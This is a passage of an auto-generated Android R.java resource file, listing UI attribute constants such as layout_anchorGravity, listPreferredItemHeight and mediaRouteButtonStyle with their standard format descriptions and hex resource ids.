(millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int itemHorizontalPadding=0x7f0101a0; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int itemHorizontalTranslationEnabled=0x7f010156; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int itemIconPadding=0x7f0101a1; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int itemIconSize=0x7f010153; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int itemIconTint=0x7f01019b; /** Specifies padding that should be applied to the left and right sides of system-provided items in the bar. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int itemPadding=0x7f01003d; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int itemSpacing=0x7f010193; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int itemTextAppearance=0x7f01019e; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int itemTextAppearanceActive=0x7f010155; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int itemTextAppearanceInactive=0x7f010154; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int itemTextColor=0x7f01019c; /** A reference to an array of integers representing the locations of horizontal keylines in dp from the starting edge. Child views can refer to these keylines for alignment using layout_keyline="index" where index is a 0-based index into this array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int keylines=0x7f0101dd; /** <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>auto</code></td><td>-1</td><td></td></tr> <tr><td><code>selected</code></td><td>0</td><td></td></tr> <tr><td><code>labeled</code></td><td>1</td><td></td></tr> <tr><td><code>unlabeled</code></td><td>2</td><td></td></tr> </table> */ public static final int labelVisibilityMode=0x7f010152; /** Distance from the bottom of the TextView to the last text baseline. If set, this overrides the value set for paddingBottom. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int lastBaselineToBottomHeight=0x7f010060; /** The layout to use for the search view. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int layout=0x7f0100f6; /** Class name of the Layout Manager to be used. <p/> The class must extandroidx.recyclerview.widget.RecyclerViewView$LayoutManager and have either a default constructor or constructor with the signature (android.content.Context, android.util.AttributeSet, int, int). <p/> If the name starts with a '.', application package is prefixed. Else, if the name contains a '.', the classname is assumed to be a full class name. Else, the recycler view package naandroidx.appcompat.widgetdget) is prefixed. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int layoutManager=0x7f010006; /** The id of an anchor view that this view should position relative to. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int layout_anchor=0x7f0101e0; /** Specifies how an object should position relative to an anchor, on both the X and Y axes, within its parent's bounds. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>top</code></td><td>0x30</td><td> Push object to the top of its container, not changing its size. </td></tr> <tr><td><code>bottom</code></td><td>0x50</td><td> Push object to the bottom of its container, not changing its size. </td></tr> <tr><td><code>left</code></td><td>0x03</td><td> Push object to the left of its container, not changing its size. </td></tr> <tr><td><code>right</code></td><td>0x05</td><td> Push object to the right of its container, not changing its size. </td></tr> <tr><td><code>center_vertical</code></td><td>0x10</td><td> Place object in the vertical center of its container, not changing its size. </td></tr> <tr><td><code>fill_vertical</code></td><td>0x70</td><td> Grow the vertical size of the object if needed so it completely fills its container. </td></tr> <tr><td><code>center_horizontal</code></td><td>0x01</td><td> Place object in the horizontal center of its container, not changing its size. </td></tr> <tr><td><code>fill_horizontal</code></td><td>0x07</td><td> Grow the horizontal size of the object if needed so it completely fills its container. </td></tr> <tr><td><code>center</code></td><td>0x11</td><td> Place the object in the center of its container in both the vertical and horizontal axis, not changing its size. </td></tr> <tr><td><code>fill</code></td><td>0x77</td><td> Grow the horizontal and vertical size of the object if needed so it completely fills its container. </td></tr> <tr><td><code>clip_vertical</code></td><td>0x80</td><td> Additional option that can be set to have the top and/or bottom edges of the child clipped to its container's bounds. The clip will be based on the vertical gravity: a top gravity will clip the bottom edge, a bottom gravity will clip the top edge, and neither will clip both edges. </td></tr> <tr><td><code>clip_horizontal</code></td><td>0x08</td><td> Additional option that can be set to have the left and/or right edges of the child clipped to its container's bounds. The clip will be based on the horizontal gravity: a left gravity will clip the right edge, a right gravity will clip the left edge, and neither will clip both edges. </td></tr> <tr><td><code>start</code></td><td>0x00800003</td><td> Push object to the beginning of its container, not changing its size. </td></tr> <tr><td><code>end</code></td><td>0x00800005</td><td> Push object to the end of its container, not changing its size. </td></tr> </table> */ public static final int layout_anchorGravity=0x7f0101e2; /** The class name of a Behavior class defining special runtime behavior for this child view. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int layout_behavior=0x7f0101df; /** <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0</td><td></td></tr> <tr><td><code>pin</code></td><td>1</td><td></td></tr> <tr><td><code>parallax</code></td><td>2</td><td></td></tr> </table> */ public static final int layout_collapseMode=0x7f010189; /** <p>Must be a floating point value, such as "<code>1.2</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int layout_collapseParallaxMultiplier=0x7f01018a; /** Specifies how this view dodges the inset edges of the CoordinatorLayout. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0x0</td><td> Don't dodge any edges </td></tr> <tr><td><code>top</code></td><td>0x30</td><td> Dodge the top inset edge. </td></tr> <tr><td><code>bottom</code></td><td>0x50</td><td> Dodge the bottom inset edge. </td></tr> <tr><td><code>left</code></td><td>0x03</td><td> Dodge the left inset edge. </td></tr> <tr><td><code>right</code></td><td>0x05</td><td> Dodge the right inset edge. </td></tr> <tr><td><code>start</code></td><td>0x00800003</td><td> Dodge the start inset edge. </td></tr> <tr><td><code>end</code></td><td>0x00800005</td><td> Dodge the end inset edge. </td></tr> <tr><td><code>all</code></td><td>0x77</td><td> Dodge all the inset edges. </td></tr> </table> */ public static final int layout_dodgeInsetEdges=0x7f0101e4; /** Specifies how this view insets the CoordinatorLayout and make some other views dodge it. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0x0</td><td> Don't inset. </td></tr> <tr><td><code>top</code></td><td>0x30</td><td> Inset the top edge. </td></tr> <tr><td><code>bottom</code></td><td>0x50</td><td> Inset the bottom edge. </td></tr> <tr><td><code>left</code></td><td>0x03</td><td> Inset the left edge. </td></tr> <tr><td><code>right</code></td><td>0x05</td><td> Inset the right edge. </td></tr> <tr><td><code>start</code></td><td>0x00800003</td><td> Inset the start edge. </td></tr> <tr><td><code>end</code></td><td>0x00800005</td><td> Inset the end edge. </td></tr> </table> */ public static final int layout_insetEdge=0x7f0101e3; /** The index of a keyline this view should position relative to. android:layout_gravity will affect how the view aligns to the specified keyline. <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int layout_keyline=0x7f0101e1; /** <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>scroll</code></td><td>0x1</td><td></td></tr> <tr><td><code>exitUntilCollapsed</code></td><td>0x2</td><td></td></tr> <tr><td><code>enterAlways</code></td><td>0x4</td><td></td></tr> <tr><td><code>enterAlwaysCollapsed</code></td><td>0x8</td><td></td></tr> <tr><td><code>snap</code></td><td>0x10</td><td></td></tr> <tr><td><code>snapMargins</code></td><td>0x20</td><td></td></tr> </table> */ public static final int layout_scrollFlags=0x7f01014b; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int layout_scrollInterpolator=0x7f01014c; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int liftOnScroll=0x7f010146; /** Explicit height between lines of text. If set, this will override the values set for lineSpacingExtra and lineSpacingMultiplier. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int lineHeight=0x7f01005e; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int lineSpacing=0x7f010194; /** Drawable used as a background for selected list items. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int listChoiceBackgroundIndicator=0x7f0100b3; /** The list divider used in alert dialogs. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int listDividerAlertDialog=0x7f01008c; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int listItemLayout=0x7f01004e; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int listLayout=0x7f01004b; /** Default menu-style ListView style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int listMenuViewStyle=0x7f0100d3; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int listPopupWindowStyle=0x7f0100ac; /** The preferred list item height. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int listPreferredItemHeight=0x7f0100a6; /** A larger, more robust list item height. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int listPreferredItemHeightLarge=0x7f0100a8; /** A smaller, sleeker list item height. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int listPreferredItemHeightSmall=0x7f0100a7; /** The preferred padding along the left edge of list items. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int listPreferredItemPaddingLeft=0x7f0100a9; /** The preferred padding along the right edge of list items. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int listPreferredItemPaddingRight=0x7f0100aa; /** Specifies the drawable used for the application logo. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int logo=0x7f010033; /** A content description string to describe the appearance of the associated logo image. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int logoDescription=0x7f01011c; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int materialButtonStyle=0x7f01012e; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int materialCardViewStyle=0x7f01012f; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int maxActionInlineWidth=0x7f0101a6; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int maxButtonHeight=0x7f010116; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int maxImageSize=0x7f010191; /** When set to true, all children with a weight will be considered having the minimum size of the largest child. If false, all children are measured normally. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int measureWithLargestChild=0x7f0100e3; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int mediaRouteAudioTrackDrawable=0x7f01000f; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int mediaRouteButtonStyle=0x7f010010; /** Tint to apply to the media route button <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int mediaRouteButtonTint=0x7f01001c; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int mediaRouteCloseDrawable=0x7f010011; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int mediaRouteControlPanelThemeOverlay=0x7f010012; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int mediaRouteDefaultIconDrawable=0x7f010013; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int mediaRoutePauseDrawable=0x7f010014; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int mediaRoutePlayDrawable=0x7f010015; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int mediaRouteSpeakerGroupIconDrawable=0x7f010016; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int mediaRouteSpeakerIconDrawable=0x7f010017; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int mediaRouteStopDrawable=0x7f010018; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int mediaRouteTheme=0x7f010019; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int mediaRouteTvIconDrawable=0x7f01001a; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int menu=0x7f01019a; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int multiChoiceItemLayout=0x7f01004c; /** Text to set as the content description for the navigation button located at the start of the toolbar. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int navigationContentDescription=0x7f01011b; /** Icon drawable to use for the navigation button located at the start of the toolbar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int navigationIcon=0x7f01011a; /** The type of navigation to use. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>normal</code></td><td>0</td><td> Normal static title text </td></tr> <tr><td><code>listMode</code></td><td>1</td><td> The action bar will use a selection list for navigation. </td></tr> <tr><td><code>tabMode</code></td><td>2</td><td> The action bar will use a series of horizontal tabs for navigation. </td></tr> </table> */ public static final int navigationMode=0x7f01002d; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int navigationViewStyle=0x7f010130; /** The numeric modifier key. This is the modifier when using a numeric (e.g., 12-key) keyboard. The values should be kept in sync with KeyEvent <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>META</code></td><td>0x10000</td><td></td></tr> <tr><td><code>CTRL</code></td><td>0x1000</td><td></td></tr> <tr><td><code>ALT</code></td><td>0x02</td><td></td></tr> <tr><td><code>SHIFT</code></td><td>0x1</td><td></td></tr> <tr><td><code>SYM</code></td><td>0x4</td><td></td></tr> <tr><td><code>FUNCTION</code></td><td>0x8</td><td></td></tr> </table> */ public static final int numericModifiers=0x7f0100e7; /** Whether the popup window should overlap its anchor view. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int overlapAnchor=0x7f0100f2; /** Bottom padding to use when no buttons are present. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int paddingBottomNoButtons=0x7f0100f4; /** Sets the padding, in pixels, of the end edge; see {@link android.R.attr#padding}. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int paddingEnd=0x7f010120; /** Sets the padding, in pixels, of the start edge; see {@link android.R.attr#padding}. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int paddingStart=0x7f01011f; /** Top padding to use when no title is present. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int paddingTopNoTitle=0x7f0100f5; /** The background of a panel when it is inset from the left and right edges of the screen. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int panelBackground=0x7f0100b0; /** Default Panel Menu style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int panelMenuListTheme=0x7f0100b2; /** Default Panel Menu width. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent 